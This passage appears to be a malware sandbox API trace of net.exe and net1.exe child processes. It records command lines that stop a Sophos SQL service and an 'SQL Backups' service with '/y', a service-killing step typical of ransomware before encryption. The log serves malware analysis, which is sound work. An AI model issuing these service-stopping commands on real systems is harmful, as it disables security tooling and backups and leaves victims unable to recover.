_SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0214.530] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0214.531] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x61b338, nSize=0x800, Arguments=0x619dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0214.532] GetFileType (hFile=0x26c) returned 0x3 [0214.532] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2f4000 [0214.532] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2f4000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0214.532] WriteFile (in: hFile=0x26c, lpBuffer=0x2f4000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x22fd5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22fd5c, lpOverlapped=0x0) returned 0 [0214.532] LocalFree (hMem=0x2f4000) returned 0x0 [0214.532] GetFileType (hFile=0x26c) returned 0x3 [0214.532] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2f62a8 [0214.532] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2f62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n/", lpUsedDefaultChar=0x0) returned 2 [0214.532] WriteFile (in: hFile=0x26c, lpBuffer=0x2f62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x22fd5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22fd5c, lpOverlapped=0x0) returned 0 [0214.532] LocalFree (hMem=0x2f62a8) returned 0x0 [0214.532] _ultow (in: _Dest=0x889, _Radix=2293132 | out: _Dest=0x889) returned="2185" [0214.532] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x61b338, nSize=0x800, Arguments=0x619dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0214.532] GetFileType (hFile=0x26c) returned 0x3 [0214.533] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2f62a8 [0214.533] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2f62a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0214.533] WriteFile (in: hFile=0x26c, lpBuffer=0x2f62a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x22fd68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22fd68, lpOverlapped=0x0) returned 0 [0214.533] LocalFree (hMem=0x2f62a8) returned 0x0 [0214.533] GetFileType (hFile=0x26c) returned 0x3 [0214.533] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2f62a8 [0214.533] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2f62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n/", lpUsedDefaultChar=0x0) returned 2 [0214.533] WriteFile (in: hFile=0x26c, lpBuffer=0x2f62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x22fd68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22fd68, lpOverlapped=0x0) returned 0 [0214.533] LocalFree (hMem=0x2f62a8) returned 0x0 [0214.533] NetApiBufferFree (Buffer=0x2f1c70) returned 0x0 [0214.533] NetApiBufferFree (Buffer=0x2f1c88) returned 0x0 [0214.533] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SOPHOS /y" [0214.534] exit (_Code=2) Process: id = "332" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x69602000" os_pid = "0x7b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£SQL BackupsΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 505 os_tid = 0x588 Process: id = "333" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x639f2000" os_pid = "0x55c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "332" os_parent_pid = "0x7b8" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£SQL BackupsΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 506 os_tid = 0xbb0 [0214.670] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f83c | out: lpSystemTimeAsFileTime=0x26f83c*(dwLowDateTime=0x49241220, dwHighDateTime=0x1d57a87)) [0214.670] GetCurrentProcessId () returned 0x55c [0214.670] GetCurrentThreadId () returned 0xbb0 [0214.670] GetTickCount () returned 0x116f3a3 [0214.670] QueryPerformanceCounter (in: lpPerformanceCount=0x26f834 | out: lpPerformanceCount=0x26f834*=33495453098) returned 1 [0214.670] GetModuleHandleA (lpModuleName=0x0) returned 0x6c0000 [0214.670] __set_app_type (_Type=0x1) [0214.670] __p__fmode () returned 0x74eb31f4 [0214.670] __p__commode () returned 0x74eb31fc [0214.670] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x6cffe6) returned 0x0 [0214.671] __getmainargs (in: _Argc=0x6d9064, _Argv=0x6d906c, _Env=0x6d9068, _DoWildCard=0, _StartInfo=0x6d9024 | out: _Argc=0x6d9064, _Argv=0x6d906c, _Env=0x6d9068) returned 0 [0214.671] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0214.671] GetConsoleOutputCP () returned 0x1b5 [0214.671] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x6d9080 | out: lpCPInfo=0x6d9080) returned 1 [0214.671] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.674] sprintf_s (in: _DstBuf=0x26f7f4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0214.674] setlocale (category=0, locale=".437") returned="English_United States.437" [0214.677] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0214.677] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0214.677] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£SQL BackupsΓÇ¥ /y" [0214.677] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26f5c0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0214.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7a) returned 0x2c3c18 [0214.677] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0214.677] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x26f7c4 | out: Buffer=0x26f7c4*=0x2c1c78) returned 0x0 [0214.677] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x26f7c4 | out: Buffer=0x26f7c4*=0x2c1c90) returned 0x0 [0214.677] _fileno (_File=0x74eb2900) returned -2 [0214.677] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0214.677] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0214.677] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0214.677] _wcsicmp (_String1="config", _String2="stop") returned -16 [0214.677] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0214.677] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0214.677] _wcsicmp (_String1="file", _String2="stop") returned -13 [0214.677] _wcsicmp (_String1="files", _String2="stop") returned -13 [0214.677] _wcsicmp (_String1="group", _String2="stop") returned -12 [0214.678] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0214.678] _wcsicmp (_String1="help", _String2="stop") returned -11 [0214.678] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0214.678] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0214.678] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0214.678] _wcsicmp (_String1="session", _String2="stop") returned -15 [0214.678] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0214.678] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0214.678] _wcsicmp (_String1="share", _String2="stop") returned -12 [0214.678] _wcsicmp (_String1="start", _String2="stop") returned -14 [0214.678] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0214.678] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0214.678] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0214.678] _wcsicmp (_String1="accounts", _String2="ΓÇ£SQL") returned -850 [0214.678] _wcsicmp (_String1="computer", _String2="ΓÇ£SQL") returned -848 [0214.678] _wcsicmp (_String1="config", _String2="ΓÇ£SQL") returned -848 [0214.678] _wcsicmp (_String1="continue", _String2="ΓÇ£SQL") returned -848 [0214.678] _wcsicmp (_String1="cont", _String2="ΓÇ£SQL") returned -848 [0214.678] _wcsicmp (_String1="file", _String2="ΓÇ£SQL") returned -845 [0214.678] _wcsicmp (_String1="files", _String2="ΓÇ£SQL") returned -845 [0214.678] _wcsicmp (_String1="group", _String2="ΓÇ£SQL") returned -844 [0214.678] _wcsicmp (_String1="groups", _String2="ΓÇ£SQL") returned -844 [0214.678] _wcsicmp (_String1="help", _String2="ΓÇ£SQL") returned -843 [0214.678] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£SQL") returned -843 [0214.678] _wcsicmp (_String1="localgroup", _String2="ΓÇ£SQL") returned -839 [0214.678] _wcsicmp (_String1="pause", _String2="ΓÇ£SQL") returned -835 [0214.678] _wcsicmp (_String1="session", _String2="ΓÇ£SQL") returned -832 [0214.678] _wcsicmp (_String1="sessions", _String2="ΓÇ£SQL") returned -832 [0214.678] _wcsicmp (_String1="sess", _String2="ΓÇ£SQL") returned -832 [0214.678] _wcsicmp (_String1="share", _String2="ΓÇ£SQL") returned -832 [0214.678] _wcsicmp (_String1="start", _String2="ΓÇ£SQL") returned -832 [0214.678] _wcsicmp (_String1="stats", _String2="ΓÇ£SQL") returned -832 [0214.678] _wcsicmp (_String1="statistics", _String2="ΓÇ£SQL") returned -832 [0214.678] _wcsicmp (_String1="stop", _String2="ΓÇ£SQL") returned -832 [0214.679] _wcsicmp (_String1="time", _String2="ΓÇ£SQL") returned -831 [0214.679] _wcsicmp (_String1="user", _String2="ΓÇ£SQL") returned -830 [0214.679] _wcsicmp (_String1="users", _String2="ΓÇ£SQL") returned -830 [0214.679] _wcsicmp (_String1="msg", _String2="ΓÇ£SQL") returned -838 [0214.679] _wcsicmp (_String1="messenger", _String2="ΓÇ£SQL") returned -838 [0214.679] _wcsicmp (_String1="receiver", _String2="ΓÇ£SQL") returned -833 [0214.679] _wcsicmp (_String1="rcv", _String2="ΓÇ£SQL") returned -833 [0214.679] _wcsicmp (_String1="netpopup", _String2="ΓÇ£SQL") returned -837 [0214.679] _wcsicmp (_String1="redirector", _String2="ΓÇ£SQL") returned -833 [0214.679] _wcsicmp (_String1="redir", _String2="ΓÇ£SQL") returned -833 [0214.679] _wcsicmp (_String1="rdr", _String2="ΓÇ£SQL") returned -833 [0214.679] _wcsicmp (_String1="workstation", _String2="ΓÇ£SQL") returned -828 [0214.679] _wcsicmp (_String1="work", _String2="ΓÇ£SQL") returned -828 [0214.679] _wcsicmp (_String1="wksta", _String2="ΓÇ£SQL") returned -828 [0214.679] _wcsicmp (_String1="prdr", _String2="ΓÇ£SQL") returned -835 [0214.679] _wcsicmp (_String1="devrdr", _String2="ΓÇ£SQL") returned -847 [0214.679] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£SQL") returned -839 [0214.679] _wcsicmp (_String1="server", _String2="ΓÇ£SQL") returned -832 [0214.679] _wcsicmp (_String1="svr", _String2="ΓÇ£SQL") returned -832 [0214.679] _wcsicmp (_String1="srv", _String2="ΓÇ£SQL") returned -832 [0214.679] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£SQL") returned -839 [0214.679] _wcsicmp (_String1="alerter", _String2="ΓÇ£SQL") returned -850 [0214.679] _wcsicmp (_String1="netlogon", _String2="ΓÇ£SQL") returned -837 [0214.679] _wcsicmp (_String1="accounts", _String2="BackupsΓÇ¥") returned -1 [0214.679] _wcsicmp (_String1="computer", _String2="BackupsΓÇ¥") returned 1 [0214.679] _wcsicmp (_String1="config", _String2="BackupsΓÇ¥") returned 1 [0214.679] _wcsicmp (_String1="continue", _String2="BackupsΓÇ¥") returned 1 [0214.679] _wcsicmp (_String1="cont", _String2="BackupsΓÇ¥") returned 1 [0214.679] _wcsicmp (_String1="file", _String2="BackupsΓÇ¥") returned 4 [0214.679] _wcsicmp (_String1="files", _String2="BackupsΓÇ¥") returned 4 [0214.679] _wcsicmp (_String1="group", _String2="BackupsΓÇ¥") returned 5 [0214.679] _wcsicmp (_String1="groups", _String2="BackupsΓÇ¥") returned 5 [0214.680] _wcsicmp (_String1="help", _String2="BackupsΓÇ¥") returned 6 [0214.680] _wcsicmp (_String1="helpmsg", _String2="BackupsΓÇ¥") returned 6 [0214.680] _wcsicmp (_String1="localgroup", _String2="BackupsΓÇ¥") returned 10 [0214.680] _wcsicmp (_String1="pause", _String2="BackupsΓÇ¥") returned 14 [0214.680] _wcsicmp (_String1="session", _String2="BackupsΓÇ¥") returned 17 [0214.680] _wcsicmp (_String1="sessions", _String2="BackupsΓÇ¥") returned 17 [0214.680] _wcsicmp (_String1="sess", _String2="BackupsΓÇ¥") returned 17 [0214.680] _wcsicmp (_String1="share", _String2="BackupsΓÇ¥") returned 17 [0214.680] _wcsicmp (_String1="start", _String2="BackupsΓÇ¥") returned 17 [0214.680] _wcsicmp (_String1="stats", _String2="BackupsΓÇ¥") returned 17 [0214.680] _wcsicmp (_String1="statistics", _String2="BackupsΓÇ¥") returned 17 [0214.680] _wcsicmp (_String1="stop", _String2="BackupsΓÇ¥") returned 17 [0214.680] _wcsicmp (_String1="time", _String2="BackupsΓÇ¥") returned 18 [0214.680] _wcsicmp (_String1="user", _String2="BackupsΓÇ¥") returned 19 [0214.680] _wcsicmp (_String1="users", _String2="BackupsΓÇ¥") returned 19 [0214.680] _wcsicmp (_String1="msg", _String2="BackupsΓÇ¥") returned 11 [0214.680] _wcsicmp (_String1="messenger", _String2="BackupsΓÇ¥") returned 11 [0214.680] _wcsicmp (_String1="receiver", _String2="BackupsΓÇ¥") returned 16 [0214.680] _wcsicmp (_String1="rcv", _String2="BackupsΓÇ¥") returned 16 [0214.680] _wcsicmp (_String1="netpopup", _String2="BackupsΓÇ¥") returned 12 [0214.680] _wcsicmp (_String1="redirector", _String2="BackupsΓÇ¥") returned 16 [0214.680] _wcsicmp (_String1="redir", _String2="BackupsΓÇ¥") returned 16 [0214.680] _wcsicmp (_String1="rdr", _String2="BackupsΓÇ¥") returned 16 [0214.680] _wcsicmp (_String1="workstation", _String2="BackupsΓÇ¥") returned 21 [0214.680] _wcsicmp (_String1="work", _String2="BackupsΓÇ¥") returned 21 [0214.680] _wcsicmp (_String1="wksta", _String2="BackupsΓÇ¥") returned 21 [0214.680] _wcsicmp (_String1="prdr", _String2="BackupsΓÇ¥") returned 14 [0214.680] _wcsicmp (_String1="devrdr", _String2="BackupsΓÇ¥") returned 2 [0214.680] _wcsicmp (_String1="lanmanworkstation", _String2="BackupsΓÇ¥") returned 10 [0214.680] _wcsicmp (_String1="server", _String2="BackupsΓÇ¥") returned 17 [0214.680] _wcsicmp (_String1="svr", _String2="BackupsΓÇ¥") returned 17 [0214.680] _wcsicmp (_String1="srv", _String2="BackupsΓÇ¥") returned 17 [0214.680] _wcsicmp (_String1="lanmanserver", _String2="BackupsΓÇ¥") returned 10 [0214.680] _wcsicmp (_String1="alerter", _String2="BackupsΓÇ¥") returned -1 [0214.680] _wcsicmp (_String1="netlogon", _String2="BackupsΓÇ¥") returned 12 [0214.680] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0214.681] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.681] wcscpy_s (in: _Destination=0x26f2c4, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0214.681] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74a80000 [0214.682] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x26f2c0, nSize=0x0, Arguments=0x26f2bc | out: lpBuffer="嘐,neth.dll") returned 0xff [0214.683] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0214.683] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0214.683] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0214.683] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0214.683] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0214.683] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0214.683] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0214.683] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0214.683] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0214.683] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0214.683] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0214.683] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0214.683] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0214.684] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0214.684] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0214.684] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0214.684] _wcsicmp (_String1="CONT", _String2="ΓÇ£SQL") returned -848 [0214.684] _wcsicmp (_String1="CONT", _String2="BackupsΓÇ¥") returned 1 [0214.684] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0214.684] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0214.684] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0214.684] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0214.684] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0214.684] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0214.684] _wcsicmp (_String1="FILES", _String2="ΓÇ£SQL") returned -845 [0214.684] _wcsicmp (_String1="FILES", _String2="BackupsΓÇ¥") returned 4 [0214.684] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0214.684] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0214.684] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0214.684] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0214.684] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0214.684] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0214.684] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£SQL") returned -844 [0214.684] _wcsicmp (_String1="GROUPS", _String2="BackupsΓÇ¥") returned 5 [0214.684] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0214.684] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0214.684] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0214.684] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0214.684] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0214.684] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0214.684] _wcsicmp (_String1="REPL", _String2="ΓÇ£SQL") returned -833 [0214.684] _wcsicmp (_String1="REPL", _String2="BackupsΓÇ¥") returned 16 [0214.684] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0214.684] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0214.684] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0214.684] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£SQL") returned -833 [0214.684] _wcsicmp (_String1="REPLICATOR", _String2="BackupsΓÇ¥") returned 16 [0214.684] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0214.684] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0214.685] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0214.685] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0214.685] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0214.685] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0214.685] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£SQL") returned -832 [0214.685] _wcsicmp (_String1="SESSIONS", _String2="BackupsΓÇ¥") returned 17 [0214.685] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0214.685] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0214.685] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0214.685] _wcsicmp (_String1="SESS", _String2="ΓÇ£SQL") returned -832 [0214.685] _wcsicmp (_String1="SESS", _String2="BackupsΓÇ¥") returned 17 [0214.685] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0214.685] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0214.685] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0214.685] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0214.685] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0214.685] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0214.685] _wcsicmp (_String1="STATS", _String2="ΓÇ£SQL") returned -832 [0214.685] _wcsicmp (_String1="STATS", _String2="BackupsΓÇ¥") returned 17 [0214.685] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0214.685] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0214.685] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0214.685] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0214.685] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0214.685] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0214.685] _wcsicmp (_String1="USERS", _String2="ΓÇ£SQL") returned -830 [0214.685] _wcsicmp (_String1="USERS", _String2="BackupsΓÇ¥") returned 19 [0214.685] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0214.685] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0214.685] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0214.685] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0214.685] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0214.685] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0214.685] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£SQL") returned -833 [0214.685] _wcsicmp (_String1="REDIRECTOR", _String2="BackupsΓÇ¥") returned 16 [0214.686] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0214.686] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0214.686] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0214.686] _wcsicmp (_String1="REDIR", _String2="ΓÇ£SQL") returned -833 [0214.686] _wcsicmp (_String1="REDIR", _String2="BackupsΓÇ¥") returned 16 [0214.686] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0214.686] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0214.686] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0214.686] _wcsicmp (_String1="RDR", _String2="ΓÇ£SQL") returned -833 [0214.686] _wcsicmp (_String1="RDR", _String2="BackupsΓÇ¥") returned 16 [0214.686] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0214.686] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0214.686] _wcsicmp (_String1="WORK", _String2="stop") returned 4 